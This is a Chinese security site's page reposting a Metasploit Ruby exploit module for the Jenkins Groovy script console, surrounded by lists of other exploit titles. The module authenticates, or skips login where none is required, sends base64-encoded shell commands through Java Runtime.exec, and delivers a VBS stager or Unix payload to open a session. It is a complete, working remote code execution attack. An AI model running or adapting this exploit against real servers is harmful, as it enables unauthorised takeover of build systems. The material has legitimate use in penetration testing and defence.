首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Jenkins CI Script Console Command Execution MSF Module
来源:metasploit.com 作者:McIntyre 发布时间:2013-01-21  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::CmdStagerVBS

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Jenkins Script-Console Java Execution',
   'Description'    => %q{
     This module uses the Jenkins Groovy script console to execute
    OS commands using Java.
   },
   'Author' =>
    [
     'Spencer McIntyre',
     'jamcut'
    ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: $',
   'DefaultOptions' =>
    {
     'WfsDelay' => '10',
    },
   'References'     =>
    [
     ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']
    ],
   'Targets'  =>
    [
     ['Windows',  {'Arch' => ARCH_X86, 'Platform' => 'win'}],
     ['Unix',     {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}],
    ],
   'DisclosureDate' => 'Jan 18 2013',
   'DefaultTarget'  => 0))

  register_options(
   [
    OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),
    OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),
    OptString.new('PATH', [ true, 'The path to jenkins', '/jenkins' ]),
   ], self.class)
 end

 def check
  res = send_request_cgi({'uri' => "#{datastore['PATH']}/login"})
  if res and res.headers.include?('X-Jenkins')
   return Exploit::CheckCode::Detected
  else
   return Exploit::CheckCode::Safe
  end
 end

 def http_send_command(cmd, opts = {})
  res = send_request_cgi({
   'method'    => 'POST',
   'uri'       => datastore['PATH'] + '/script',
   'cookie'    => @cookie,
   'vars_post' =>
    {
     'script' => java_craft_runtime_exec(cmd),
     'Submit' => 'Run'
    }
  })
  if not (res and res.code == 200)
   fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
  end
 end

 def java_craft_runtime_exec(cmd)
  decoder = Rex::Text.rand_text_alpha(5, 8)
  decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
  cmd_array = Rex::Text.rand_text_alpha(5, 8)
  jcode =  "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
  jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"

  jcode << "String [] #{cmd_array} = new String[3];\n"
  if target['Platform'] == 'win'
   jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
   jcode << "#{cmd_array}[1] = \"/c\";\n"
  else
   jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
   jcode << "#{cmd_array}[1] = \"-c\";\n"
  end
  jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
  jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
  jcode
 end

 def execute_command(cmd, opts = {})
  http_send_command("#{cmd}")
 end

 def exploit
  print_status('Checking access to the script console')
  res = send_request_cgi({'uri' => "#{datastore['PATH']}/script"})
  if not (res and res.code)
   fail_with(Exploit::Failure::Unknown)
  end

  sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0]
  @cookie = "#{sessionid}"

  if res.code != 200
   print_status('Logging in...')
   res = send_request_cgi({
    'method'    => 'POST',
    'uri'       => datastore['PATH'] + '/j_acegi_security_check',
    'cookie'    => @cookie,
    'vars_post' =>
     {
      'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
      'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),
      'Submit'     => 'log in'
     }
   })

   if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
    fail_with(Exploit::Failure::NoAccess, 'login failed')
   end
  else
   print_status('No authentication required, skipping login...')
  end

  case target['Platform']
  when 'win'
   print_status("#{rhost}:#{rport} - Sending VBS stager...")
   execute_cmdstager({:linemax => 2049})

  when 'unix'
   print_status("#{rhost}:#{rport} - Sending payload...")
   http_send_command("#{payload.encoded}")
  end

  handler
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Novell NCP Pre-Auth Remote Roo
·NVidia Display Driver Service
·PHP-Charts 1.0 PHP Code Execut
·Java Applet Method Handle Remo
·SonicWALL GMS/VIEWPOINT 6.x An
·Java Applet AverageRangeStatis
·Atheme IRC Services 7.0.5 Deni
·Simatic WinCC Information Harv
·ZoneMinder Video Server packag
·Nagios3 history.cgi Host Comma
·Movable Type 4.2x, 4.3x Web Up
·Freesshd Authentication Bypass
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved